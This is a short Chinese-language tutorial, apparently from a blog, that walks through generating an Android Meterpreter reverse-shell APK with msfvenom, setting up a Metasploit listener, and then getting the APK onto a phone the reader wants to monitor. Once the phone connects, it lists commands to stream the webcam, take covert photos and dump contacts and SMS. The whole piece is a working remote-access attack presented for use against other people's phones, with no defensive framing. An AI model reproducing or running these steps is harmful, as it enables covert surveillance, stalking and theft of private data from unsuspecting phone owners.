1.查看kail虚拟机ip
图片.png
然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功
图片.png
图片.png
然后输入命令:msfconsole来启动msfconsole,启动过程需要等待一会儿。
图片.png
1.use exploit/multi/handler //加载模块
- set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
图片.png
这里需要设置LHOST的ip地址,也就是你的kali的ip地址
还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)
1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
图片.png
3.exploit //开始执行漏洞 开始监听,等待手机上线
接下来就要发挥你的聪明才智将这个apk装在你想监控的手机上了
一旦手机用户运行该apk 手机上线 后就可以输入sysinfo 查看手机信息
图片.png
webcam_list 查看手机有多少个摄像头 这里显示是2个
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
dump_contacts //导出电话号码
dump_sms //导出信息
可以输入?查看更多命令
好了,自己测试去吧
图片.png
网友评论